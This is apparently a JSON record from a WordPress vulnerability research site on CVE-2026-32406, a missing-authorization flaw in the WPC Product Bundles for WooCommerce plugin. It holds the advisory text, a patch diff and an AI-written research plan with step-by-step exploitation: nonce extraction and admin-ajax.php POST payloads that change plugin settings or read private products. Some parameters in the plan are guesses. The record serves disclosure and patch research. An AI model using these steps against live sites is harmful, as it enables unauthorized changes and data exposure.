[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVTnLTg3hHNFNYfKUJ2YxYoNSu-GDQj4S4ifcpZQP-pY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-32406","wpc-product-bundles-for-woocommerce-missing-authorization","WPC Product Bundles for WooCommerce \u003C= 8.4.5 - Missing Authorization","The WPC Product Bundles for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 8.4.5. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.","woo-product-bundle",null,"\u003C=8.4.5","8.4.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-22 00:00:00","2026-04-15 20:58:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd0693b76-dd6a-4ebc-8384-b7dadb606849?source=api-prod",53,[22,23,24,25],"includes\u002Fclass-woosb.php","languages\u002Fwoo-product-bundle.pot","readme.txt","wpc-product-bundles.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-32406\n\n## 1. Vulnerability Summary\nThe **WPC Product Bundles for WooCommerce** plugin (up to and including version 8.4.5) contains a **Missing Authorization** vulnerability. Specifically, the AJAX handlers registered in `includes\u002Fclass-woosb.php` fail to perform capability checks (e.g., `current_user_can( 'manage_options' )`), allowing any authenticated user with at least **Contributor-level** access to execute administrative actions. \n\nBased on the CVSS score (I:L - Integrity Low), the primary exploit path involves the `woosb_update_search_settings` action, which allows an attacker to modify global plugin configuration settings related to the product search functionality.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `woosb_update_search_settings` (as registered in `includes\u002Fclass-woosb.php` line 52).\n*   **Vulnerable Function:** `ajax_update_search_settings` in `WPCleverWoosb` class.\n*   **Authentication Required:** Authenticated, **Contributor** role or higher.\n*   **Payload Parameter:** `settings` (likely a URL-encoded string or array of search configuration options).\n*   **Preconditions:** The plugin must be active, and a valid WordPress nonce for the action must be obtained.\n\n## 3. Code Flow\n1.  **Entry Point:** The plugin registers AJAX hooks in `WPCleverWoosb::__construct`:\n    ```php\n    add_action( 'wp_ajax_woosb_update_search_settings', [ $this, 'ajax_update_search_settings' ] );\n    ```\n2.  **Missing Check:** In `includes\u002Fclass-woosb.php`, the function `ajax_update_search_settings` is called. It lacks a check for `current_user_can()`.\n3.  **Sink:** The function likely processes the `$_POST['settings']` parameter and updates a WordPress option (e.g., `woosb_search_settings`) or user metadata using `update_option()` or `update_user_meta()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin enqueues scripts for the backend in `admin_enqueue_scripts`. The nonce required for AJAX requests is typically localized into a JavaScript object.\n\n1.  **Identify Variable:** WPClever plugins usually use the variable `woosb_vars`.\n2.  **Navigation:** Log in as a **Contributor** and navigate to any page where the plugin's admin scripts are loaded. Although Contributors have limited access, they can access the dashboard.\n3.  **Extraction:**\n    *   Navigate to: `\u002Fwp-admin\u002Findex.php` (Dashboard).\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        window.woosb_vars?.nonce\n        ```\n    *   If `woosb_vars` is not found on the dashboard, check `\u002Fwp-admin\u002Fedit.php?post_type=product` (Contributors can often view the product list even if they cannot edit).\n\n## 5. Exploitation Strategy\n### Step 1: Data Setup\n1.  Create a user with the **Contributor** role.\n2.  Check the current value of the search settings via WP-CLI:\n    ```bash\n    wp option get woosb_search_settings\n    ```\n\n### Step 2: Nonce Extraction\n1.  Log into the WordPress site as the Contributor via `browser_navigate`.\n2.  Execute `browser_eval` to retrieve `woosb_vars.nonce`.\n\n### Step 3: Trigger Unauthorized Setting Update\nSubmit an unprivileged POST request to modify the plugin's search behavior. We will attempt to change the `limit` or `search_sku` settings.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=woosb_update_search_settings&nonce=[EXTRACTED_NONCE]&settings=limit=999&search_sku=yes&search_exact=yes\n    ```\n\n## 6. Test Data Setup\n*   **Plugin:** WPC Product Bundles for WooCommerce 8.4.5.\n*   **User:** Contributor (username: `attacker`, password: `password123`).\n*   **Configuration:** No special configuration is required as the vulnerability is in the default AJAX handler.\n\n## 7. Expected Results\n*   **Response:** The server should return a JSON success message (e.g., `{\"success\":true}`).\n*   **State Change:** The global option `woosb_search_settings` should be updated to reflect the values provided in the payload.\n\n## 8. Verification Steps\n1.  **Verify via CLI:**\n    ```bash\n    wp option get woosb_search_settings\n    ```\n2.  **Check for Persistence:** The output should show the modified `limit` (999) and other parameters injected during the exploit.\n3.  **Security Check:** Confirm that the user `attacker` (Contributor) does **not** have the `manage_options` capability, yet was able to change this setting.\n\n## 9. Alternative Approaches\nIf `woosb_update_search_settings` proves to be restricted to user-meta only (unlikely based on the plugin structure), target the second AJAX action:\n*   **Action:** `woosb_get_search_results`\n*   **Goal:** Information Disclosure.\n*   **Payload:** `action=woosb_get_search_results&nonce=[NONCE]&keyword=secret`\n*   **Success Criteria:** If this action returns products that are in \"Draft\" or \"Private\" status which the Contributor should not be able to see, it confirms the Missing Authorization vulnerability for sensitive data retrieval.","The WPC Product Bundles for WooCommerce plugin for WordPress is vulnerable to unauthorized access and information disclosure due to missing capability checks on several AJAX handlers. This allows authenticated attackers with contributor-level permissions or higher to modify plugin search settings or view private product data that should be restricted.","\u002F\u002F includes\u002Fclass-woosb.php line 52\nadd_action( 'wp_ajax_woosb_update_search_settings', [ $this, 'ajax_update_search_settings' ] );\nadd_action( 'wp_ajax_woosb_get_search_results', [ $this, 'ajax_get_search_results' ] );\n\n---\n\n\u002F\u002F includes\u002Fclass-woosb.php line 2482\n                if ( $query->have_posts() ) {\n                    while ( $query->have_posts() ) {\n                        $query->the_post();\n                        $_product = wc_get_product( get_the_ID() );\n\n                        if ( ! $_product ) {\n                            continue;\n                        }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.5\u002Fincludes\u002Fclass-woosb.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.6\u002Fincludes\u002Fclass-woosb.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.5\u002Fincludes\u002Fclass-woosb.php\t2026-02-10 10:27:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.6\u002Fincludes\u002Fclass-woosb.php\t2026-02-11 09:16:18.000000000 +0000\n@@ -136,7 +136,7 @@\n             }\n \n             \u002F\u002F Admin order\n-            add_action( 'woocommerce_ajax_add_order_item_meta', [ $this, 'ajax_add_order_item_meta' ], 10, 3 );\n+            add_action( 'woocommerce_ajax_add_order_item_meta', [ $this, 'add_order_item_meta' ], 10, 3 );\n             add_filter( 'woocommerce_hidden_order_itemmeta', [ $this, 'hidden_order_itemmeta' ] );\n             add_action( 'woocommerce_before_order_itemmeta', [ $this, 'before_order_itemmeta' ], 10, 2 );\n \n@@ -2223,7 +2223,7 @@\n             }\n         }\n \n-        function ajax_add_order_item_meta( $order_item_id, $order_item, $order ) {\n+        function add_order_item_meta( $order_item_id, $order_item, $order ) {\n             $quantity = $order_item->get_quantity();\n \n             if ( 'line_item' === $order_item->get_type() ) {\n@@ -2445,10 +2445,10 @@\n                 }\n \n                 $query_args = [\n+                        's'              => $keyword,\n                         'is_woosb'       => true,\n                         'post_type'      => 'product',\n                         'post_status'    => [ 'publish', 'private' ],\n-                        's'              => $keyword,\n                         'posts_per_page' => $limit\n                 ];\n \n@@ -2482,7 +2482,7 @@\n                     $query->the_post();\n                     $_product = wc_get_product( get_the_ID() );\n \n-                    if ( ! $_product ) {\n+                    if ( ! $_product || ! current_user_can( 'read_product', $_product->get_id() ) ) {\n                         continue;\n                     }","The exploit targets the AJAX endpoints registered in the WPCleverWoosb class. An attacker first logs in with Contributor-level credentials and navigates to the WordPress dashboard to extract a valid security nonce from the localized 'woosb_vars' JavaScript object. Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action set to 'woosb_update_search_settings' to modify global plugin configurations (like search limits or SKU matching). Alternatively, the attacker can use the 'woosb_get_search_results' action with a search keyword to retrieve data from products with 'private' or 'draft' status, bypassing standard WooCommerce visibility restrictions due to the missing 'read_product' capability check in the vulnerable version.","gemini-3-flash-preview","2026-04-19 01:43:08","2026-04-19 01:43:33",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","8.4.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-bundle\u002Ftags\u002F8.4.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-product-bundle.8.4.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-bundle\u002Ftags\u002F8.4.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-product-bundle.8.4.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-bundle\u002Ftags"]